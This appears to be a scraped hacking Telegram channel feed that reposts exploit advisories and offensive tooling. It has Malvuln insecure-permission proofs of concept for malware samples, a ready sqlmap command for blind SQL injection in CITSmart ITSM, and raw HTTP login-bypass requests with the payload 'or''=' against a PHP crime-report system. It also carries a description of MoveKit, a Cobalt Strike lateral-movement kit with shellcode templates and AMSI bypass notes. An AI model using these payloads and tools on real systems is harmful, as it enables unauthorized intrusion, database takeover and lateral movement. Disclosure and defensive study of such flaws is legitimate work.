Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.7K photos
15 videos
157 files
131K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
HEUR.Hoax.Win32.FrauDrop.gen Insecure Permissions

https://4.bp.blogspot.com/-xJ4j9VfFswY/WWlvOf_vUlI/AAAAAAAAIMo/D1-kp_Mj10E1aNmsGMS5n6nKC28DofOXwCLcBGAs/s1600/h25.png
HEUR.Hoax.Win32.FrauDrop.gen malware suffers from an insecure permissions vulnerability.

MD5 | 50c66b4d86576b7c155504ec687423d1

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/1d40e72fb8cf300298df4b828b48ec29.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: HEUR.Hoax.Win32.FrauDrop.gen
Vulnerability: Insecure Permissions
Description: FrauDrop.gen creates an insecure dir named "newdnswatch" under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the executables dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges
Type: PE32
MD5: 1d40e72fb8cf300298df4b828b48ec29
Vuln ID: MVID-2021-0170
Dropped files: config.bin, newdnswatch.exe
Disclosure: 04/13/2021

Exploit/PoC:
C:\>cacls newdnswatch
C:\newdnswatch BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
C:\>dir newdnswatch
Volume in drive C has no label.

Directory of C:\newdnswatch

04/11/2021 10:13 PM 5,677 config.bin
02/10/2018 01:21 AM 131,072 newdnswatch.exe
2 File(s) 136,749 bytes
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan.Win32.Agent.zfgh Insecure Permissions

https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
Trojan.Win32.Agent.zfgh malware suffers from an insecure permissions vulnerability.

MD5 | 3b8d24907908e6336805de66cf3aa2f4

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/a2017b547da2f06c6d7c02398cc481f6.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Trojan.Win32.Agent.zfgh
Vulnerability: Insecure Permissions
Description: Agent.zfgh creates an hidden insecure dir named "drv" under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the executables dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges
Type: PE32
MD5: a2017b547da2f06c6d7c02398cc481f6
Vuln ID: MVID-2021-0169
Dropped files: explorer.exe, MSINET.OCX, MSWINSCK.OCX
Disclosure: 04/13/2021

Exploit/PoC:
C:\>attrib -s -h drv

C:\>dir drv
Volume in drive C has no label.

Directory of C:\drv

06/14/2012 11:58 PM 290,816 explorer.exe
04/12/2021 04:05 PM 115,920 MSINET.OCX
04/12/2021 04:05 PM 124,688 MSWINSCK.OCX

C:\>cacls drv
C:\drv BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan.Win32.Jorik.qje Insecure Permissions

https://1.bp.blogspot.com/-9u0QXe9ybeo/WWlvU_DnejI/AAAAAAAAIN0/BUl-HrIsuwE3sKywG67Nuv_wLRABID6oQCLcBGAs/s1600/h45.png
Trojan.Win32.Jorik.qje malware suffers from an insecure permissions vulnerability.

MD5 | faf5ffe170a3559624827f291850035f

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/982479ad10ff048d566516254051e17e.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Trojan.Win32.Jorik.qje
Vulnerability: Insecure Permissions
Description: Jorik.qje creates an insecure dir named "oDetnlQD" under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the executables dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Type: PE32
MD5: 982479ad10ff048d566516254051e17e
Vuln ID: MVID-2021-0168
Dropped files: ogaGbWPp.exe
Disclosure: 04/13/2021

Exploit/PoC:
C:\>cacls oDetnlQD
C:\oDetnlQD BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

C:\>attrib -s -h oDetnlQD

C:\>dir oDetnlQD
Volume in drive C has no label.

Directory of C:\oDetnlQD

10/10/2017 05:47 AM 1,093,682 ogaGbWPp.exe
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
CITSmart ITSM 9.1.2.27 SQL Injection

https://3.bp.blogspot.com/-m8d6k5PvpEU/WWlvYbY80xI/AAAAAAAAIOk/9YRDlN0af5krj_sxTfYJBUTX80Cs4dJKgCLcBGAs/s1600/h56.png
CITSmart ITSM version 9.1.2.27 suffers from a remote time-based blind SQL injection vulnerability.

MD5 | 3d24d2282ef6f774e3ec4558ad1409d1

Download
# Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)
# Google Dork: "citsmart.local"
# Date: 11/03/2021
# Exploit Author: skysbsb
# Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
# Version: < 9.1.2.28
# CVE : CVE-2021-28142

To exploit this flaw it is necessary to be authenticated.

URL vulnerable:
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale
Param vulnerable: query

Sqlmap usage: sqlmap -u "
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell

Affected versions: < 9.1.2.28
Fixed versions: >= 9.1.2.28

Vendor has acknowledge this vulnerability at ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)


Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Digital Crime Report Management System 1.0 SQL Injection

https://2.bp.blogspot.com/-3bqdQy169Lk/WWlvCV-tQiI/AAAAAAAAIKk/BK-Yk_ldGYEd1hCc6yCV2jCLaxiytL8_wCLcBGAs/s1600/h127.png
Digital Crime Report Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

MD5 | 0caf2f815b9b8bcfabd56d4dce51e40c

Download
# Exploit Title: Digital Crime Report Management System 1.0 - SQL Injection (Authentication Bypass)
# Date: 13 April 2021
# Exploit Author: Galuh Muhammad Iman Akbar (GaluhID)
# Vendor Homepage: https://iwantsourcecodes.com/digital-crime-report-management-system-in-php-with-source-code/
# Software Link: https://iwantfilemanager.com/?dl=b48d951cbdd50568b031aab3b619fed2

I Found SQL Injection in 4 Page Login (Police Login page, Incharge Login page, User Login & HQ Login)
*Police Login page*

POST /digital-cyber-crime-report/policelogin.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://192.168.1.14
Connection: close
Referer: http://192.168.1.14/digital-cyber-crime-report/policelogin.php
Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
Upgrade-Insecure-Requests: 1

email='or''='&password='or''='&s=

*Incharge Login*
POST /digital-cyber-crime-report/inchargelogin.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://192.168.1.14
Connection: close
Referer: http://192.168.1.14/digital-cyber-crime-report/inchargelogin.php
Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
Upgrade-Insecure-Requests: 1

email='or''='&password='or''='&s=

*User Login*
POST /digital-cyber-crime-report/userlogin.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: http://192.168.1.14
Connection: close
Referer: http://192.168.1.14/digital-cyber-crime-report/userlogin.php
Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
Upgrade-Insecure-Requests: 1

email=imanakbar1000%40gmail.com&password='or''='&s=

*HQ Login*
POST /digital-cyber-crime-report/headlogin.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: http://192.168.1.14
Connection: close
Referer: http://192.168.1.14/digital-cyber-crime-report/headlogin.php
Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe
Upgrade-Insecure-Requests: 1

email=imanakbar1000%40gmail.com&password='or''='&s=

Source:packetstormsecurity.com
CSRF Tips

Always try to get csrf on:Continue reading on Medium ยป
Read more...
hacking: security in practice
fun hacking projects?

im learning ethical hacking, my friend gave me permission to hack him and do whatever i want as long as it doesnt unreversably harm his stuff, any fun stuff i could do? thanks for any answers btw and sorry if this has been asked a million times

submitted by /u/Debiuu
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
FBI Operation Remotely Removes Web Shells From Exchange Servers

A court order authorized the FBI to remove malicious Web shells from hundreds of vulnerable machines running on-premise Exchange Server.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
CISA Urges Caution for Security Researchers Targeted in Attack Campaign

The agency urges researchers to take precautions amid an ongoing targeted threat campaign.
Movekit is an extension of built in Cobalt Strike lateral movement by leveraging the execute_assembly function with the SharpMove and SharpRDP .NET assemblies. The aggressor script handles payload creation by reading the template files for a specific execution type. IMPORTANT: To use the script a user will only need to load the MoveKit.cna aggressor script which will load all the other necessary scripts with it. Additionally, depending on actions taken the SharpMove (https://github.com/0xthirteen/SharpMove) and SharpRDP (https://github.com/0xthirteen/SharpRDP) assemblies (https://www.kitploit.com/search/label/Assemblies) will need to be compiled and placed into the Assemblies directory. Finally, some of the file moving requires dynamic compiling which will require Mono.
When loading the aggressor script there will be a selector loaded to the menubar named Move. There are multiple selections a user can select. First, users can select to execute a command on a remote system through WMI, DCOM, Task Scheduler, RDP, or SCM. Second, there is the Command execution mechanism which uses download cradles to grab and execute the files. Third, the File method drops a file on the system and executes it. There is Write File Only that does not do any execution, move data only. Finally, there is a Default settings to make using GUI faster and used with beacon commands. The default settings are used for anything that can accept a default. To use the beacon commands it will read the default settings and use a few command line (https://www.kitploit.com/search/label/Command%20Line) arguments. A beacon command example: move-msbuild 192.168.1.1 http move.csproj Additionally, the custom pre built beacon command is a little bit different. Command example: move-pre-custom-file move-pre-custom-file computer001.local /root/payload.exe legit.exe The location field is the trickiest part of the project. When selecting WMI file movement location will be used, if SMB is selected then it will not be used (so it can be left empty). Location takes three different values. First, it location is a URL then when the payload is created it will be hosted by Cobalt Strike's web server. The beacon host where the assembly will be executed from will make a web request to the URL and grab the file, which will be used in an event sub on the target host to write the file. Second, if location is a Windows directory then it will upload the created file to the beacon host and the assembly will read it from the file system and store in the event sub to write to the remote host. Finally, if the location field is a linux path or the word local then it will dynamically compile the payload into the assembly being executed. However, if the file is above the 1MB file size limit then it will show an error. For all file methods the payload will be created through the aggressor script. However, if a payload is already created users can select to use the Custom (Prebuilt) option to move and execute it. The kit contains different file movement techniques, execution triggers, and payload types. File movement is considered the method used for getting a file to a remote host File movement types: SMB to flat file WMI to flat file WMI to Registry Key (https://www.kitploit.com/search/label/Registry%20Key) Value WMI to Custom WMI Class property Command trigger is considered the method used for executing a specific command on a remote host. Command trigger types: WMI SCM RDP DCOM (Multiple) Scheduled Tasks Modify Scheduled Task (Existing Task has action updated, executes task and resets action) Modify Service binpath (Existing Service has binpath updated, service is started and reset back to original state) Shellcode only execution: Excel 4.0 DCOM WMI Event Subscription (coming soon) Hijacks: Service DLL Hijack (coming soon) DCOM Server Hijack (coming soon)
Dependencies
Mono (MCS) for compiling .NET assemblies (Used with dynamic payload creation, InstallUtil, and Custom-NonPreBuilt). Also when FileWrite Assembly is used.
Gotchas:
Sometimes execute_assembly will be called before file movement, if this happens you can execute the payload by unchecking the Auto check box The kit does not automatically clean up files, it is left up to the operator
Note: It is recommended not using the default templates with the project.
To replace a template you must meet two requirements. First, the template must be named the technique (example: msbuild.csproj). Second, the source code must contain the string $$PAYLOAD$$ where base64 encoded shellcode will go and be able to convert a base64 string to a byte array. Example for C#: string strSC = "$$PAYLOAD$$";
byte[] sc = Convert.FromBase64String(strSC);
A change was added that allows for the defaults to update the 'Find and Replace string' and the shellcode formats in the 'Update Defaults dialog'. By default these are $$PAYLOAD$$ and base64.
Operational considerations
If using task scheduler scheduled tasks will be created and deleted If using SCM services will be created and deleted If using the AMSI bypass it will only work for WSH not PowerShell If using the AMSI bypass it will modify the registry by either updating or creating a registry key then setting it back to its original value or deleting It uses Cobalt Strike's execute-assembly function so it will inject into a sacrificial process like other post ex jobs Files will be dropped on disk if using any of the File or Command methods Templates should not be used, they are all public All of the techniques are not new and are pretty well known
Credits
Some of the code, templates or inspiration comes from other people and projects WMI - SharpWMI (https://github.com/GhostPack/SharpWMI) by harmj0y (https://twitter.com/harmj0y) DCOM - SharpCOM (https://github.com/rvrsh3ll/SharpCOM) by rvrsh3ll (https://twitter.com/424f424f) and SharpSploit DCOM (https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/LateralMovement/DCOM.cs) by cobbr (https://twitter.com/cobbr_io) SCM - CSExec (https://github.com/malcomvetter/CSExec) by Tim Malcomvetter (https://twitter.com/malcomvetter) Service DLL Hijack SharpSC (https://github.com/djhohnstein/SharpSC) by djhohnstein (https://twitter.com/djhohnstein) Service binpath modifcation SCShell (https://github.com/Mr-Un1k0d3r/SCShell) by Mr-Un1k0d3r (https://twitter.com/MrUn1k0d3r) Shellcode runner template (https://github.com/Arno0x/CSharpScripts/blob/master/shellcodeLauncher.cs) by subTee (https://twitter.com/subTee) CACTUSTORCH payloads (https://github.com/vysecurity/CACTUSTORCH) by vysecurity (https://twitter.com/vysecurity) There are probably bugs somewhere, they tend to come up from time to time. Just bring them up and I'll fix them

Download MoveKit (https://github.com/0xthirteen/MoveKit)